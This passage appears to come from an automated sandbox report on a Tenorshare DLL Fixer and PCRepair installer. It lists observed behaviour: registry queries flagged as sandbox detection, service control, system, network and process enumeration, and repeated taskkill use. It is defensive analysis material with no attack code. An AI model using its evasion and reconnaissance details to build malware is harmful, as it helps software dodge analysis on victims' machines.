Fixer\is-PUDF4.tmp 4ddigdllfixer_4ddignet_1.0.3.tmp File created C:\Program Files (x86)\Tenorshare\4DDiG DLL Fixer\cloud.6f169333.tmp 4DDiG DLL Fixer.exe -
Drops file in Windows directory 3 IoCs
description ioc Process File created C:\Windows\Installer\e635fe8.msi msiexec.exe File opened for modification C:\Windows\Installer\e635fe8.msi msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe -
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2272 sc.exe 2092 sc.exe 2860 sc.exe 6016 sc.exe 5572 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 45 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\000E PCRepair.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0006 PCRepair.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 00000000040000009bad06ecdfc7e6810000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff0000000027010100000800009bad06ec0000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff0000000007000100006809009bad06ec000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1d9bad06ec000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000009bad06ec00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 PCRepair.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0009 PCRepair.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008\ PCRepair.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0009\ PCRepair.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0003\ PCRepair.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0005 PCRepair.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID PCRepair.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\000E\ PCRepair.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0004\ PCRepair.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0005\ PCRepair.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0004 PCRepair.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008 PCRepair.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters vssvc.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Mfg PCRepair.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0009\ PCRepair.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0005 PCRepair.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName PCRepair.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Mfg PCRepair.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0003 PCRepair.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\000E\ PCRepair.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr vssvc.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0002\ PCRepair.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0004 PCRepair.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0005\ PCRepair.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg PCRepair.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0006 PCRepair.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0006\ PCRepair.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0005\ PCRepair.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\000E\ PCRepair.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0003\ PCRepair.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0005 PCRepair.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008\ PCRepair.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0004\ PCRepair.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0003\ PCRepair.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000001 PCRepair.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0006 PCRepair.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008 PCRepair.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0002\ PCRepair.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\DeviceDesc PCRepair.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters vssvc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0009 PCRepair.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags PCRepair.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID PCRepair.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0009\ PCRepair.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008 PCRepair.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID PCRepair.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0002\ PCRepair.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0002 PCRepair.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\000E PCRepair.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0004\ PCRepair.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc PCRepair.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName PCRepair.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0004 PCRepair.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0009 PCRepair.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0006\ PCRepair.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Phantom PCRepair.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0006\ PCRepair.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID PCRepair.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs PCRepair.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName PCRepair.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\DeviceDesc PCRepair.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 PCRepair.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString PCRepair.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier PCRepair.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE -
Collects information from the system 1 TTPs 5 IoCs
Uses WMIC.exe to find detailed system information.
pid Process 2992 WMIC.exe 4520 WMIC.exe 3064 WMIC.exe 5420 WMIC.exe 2092 WMIC.exe -
Detects videocard installed 1 TTPs 5 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 4064 WMIC.exe 3748 WMIC.exe 3932 WMIC.exe 2256 WMIC.exe 408 WMIC.exe -
Enumerates processes with tasklist 1 TTPs 25 IoCs
pid Process 396 tasklist.exe 1628 tasklist.exe 4084 tasklist.exe 8 tasklist.exe 5656 tasklist.exe 3164 tasklist.exe 568 tasklist.exe 1388 tasklist.exe 4056 tasklist.exe 1804 tasklist.exe 4140 tasklist.exe 2992 tasklist.exe 3056 tasklist.exe 3588 tasklist.exe 4640 tasklist.exe 2684 tasklist.exe 700 tasklist.exe 4744 tasklist.exe 2980 tasklist.exe 4172 tasklist.exe 3172 tasklist.exe 5028 tasklist.exe 3796 tasklist.exe 5728 tasklist.exe 3748 tasklist.exe -
Enumerates system info in registry 2 TTPs 19 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosDate PCRepair.exe -
Gathers network information 2 TTPs 10 IoCs
Uses commandline utility to view network configuration.
pid Process 5684 ipconfig.exe 4348 ipconfig.exe 3832 NETSTAT.EXE 4752 ipconfig.exe 3336 NETSTAT.EXE 3124 NETSTAT.EXE 4872 NETSTAT.EXE 3448 ipconfig.exe 2556 NETSTAT.EXE 5312 ipconfig.exe -
Gathers system information 1 TTPs 5 IoCs
Runs systeminfo.exe.
pid Process 2084 systeminfo.exe 4844 systeminfo.exe 2912 systeminfo.exe 5232 systeminfo.exe 6100 systeminfo.exe -
Kills process with taskkill 38 IoCs
pid Process 1396 taskkill.exe 4908 taskkill.exe 5164 taskkill.exe 1540 taskkill.exe 2028 taskkill.exe 4580 taskkill.exe 1088 taskkill.exe 2580 taskkill.exe 5728 taskkill.exe 4640 taskkill.exe 2696 taskkill.exe 5440 taskkill.exe 2856 taskkill.exe 228 taskkill.exe 4628 taskkill.exe 540 taskkill.exe 2696 taskkill.exe 6140 taskkill.exe 5096 taskkill.exe 2488 taskkill.exe 4692 taskkill.exe 5172 taskkill.exe 3200 taskkill.exe 5668 taskkill.exe 4368 taskkill.exe 4872 taskkill.exe 4608 taskkill.exe 5112 taskkill.exe 5712 taskkill.exe 4844 taskkill.exe 3856 taskkill.exe 6072 taskkill.exe 2784 taskkill.exe 3128 taskkill.exe 1564 taskkill.exe 4752 taskkill.exe 2732 taskkill.exe 552 taskkill.exe -
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-3666881604-935092360-1617577973-1000\Software\Microsoft\Internet Explorer\DOMStorage\java.com\Total = "298" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3666881604-935092360-1617577973-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3666881604-935092360-1617577973-1000\Software\Microsoft\Internet Explorer\DOMStorage\java.com IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3666881604-935092360-1617577973-1000\Software\Microsoft\Internet Explorer\DOMStorage\www.java.com\ = "22" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3666881604-935092360-1617577973-1000\Software\Microsoft\Internet Explorer\DOMStorage\www.java.com\ = "276" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3666881604-935092360-1617577973-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3666881604-935092360-1617577973-1000\Software\Microsoft\Internet Explorer\BrowserEmulation iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3666881604-935092360-1617577973-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3666881604-935092360-1617577973-1000\Software\Microsoft\Internet Explorer\DOMStorage\www.java.com\ = "222" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3666881604-935092360-1617577973-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListXMLVersionHigh = "268435456" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3666881604-935092360-1617577973-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3666881604-935092360-1617577973-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000cbaa22893fabb44cbe4ac4777554c32e000000000200000000001066000000010000200000006ea97a22c4c52a0f68dc1d05ffb3977abe71d112c19012640d16c4aad32bfc8e000000000e800000000200002000000075f8f8ad0d83741948081566b34b77a5b9b32e55a02f89eb7fb14b37c8dd74abf00100004ca28f7b9e5b41a63ae2625c710d930f47c1d2dbddd6639808bbcd7305773ba5eaf98c7a022c3e1b425d7480626cf83a5bcf3deac1b824b509c5f1b65bd6d819943ae5f1a861381d54a1cb7354cb0a605b9d009180740ee764fe793c1ef071f3fe258cd72724af72d069edb4bcee13af8742b4e49b5d64942400f82015cccc9647e50dc917a00263b34c3d27e8effa94152fee8b102f353efb198aa1e964bad8781d574379052ca82bab72e90a21aae90e7979063899fa5d349fc6911c04d6c676ed349a68d35732077040e3de2797425a062dbdfd60777254bbef8d1480b6101c2f2878f1abea8adeebf1b6ae49d1bbc33abbb837e38897f2cf28f687218d4178f756471ee46063e33a91c3da6768bb5fda529c7f64089d2e5a2e868b2a5785808daca407cb590a26c361ca632469b1a2b2e16c32aa738dbd1326caeb96244fe43b691a190b75219619b34ef50ee985d2b0d9cbd42c14dc13cc67e02a96b202216c16ab5f2bd2c47e2778ba17764bddc8012e523a17fafa6edf5f1d60a623a58b1035eac75eaaaba0fe9fec43e97599424cb551695e83eb48d49a7ea2eef88c7117c85285ec0cc447cd1acea477c9569d3b9fd0ce0b4cd96b222a733d7594e8d11345989b96679d06eb6f40387995f52a42288d1f5c6f9c7deb480a29610c9a84a02ef8f3be251491c376b29e8f6e36400000004a2bbd0a4beb950f77edfd6e1f999127b10648c632da5e8cc95e09d33b9c2e88e88a8bfc809ea4da40b40cc631928a8ef956848ee9c152ac04798a7da1812610 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3666881604-935092360-1617577973-1000\Software\Microsoft\Internet Explorer\DOMStorage\www.java.com\ = "318" 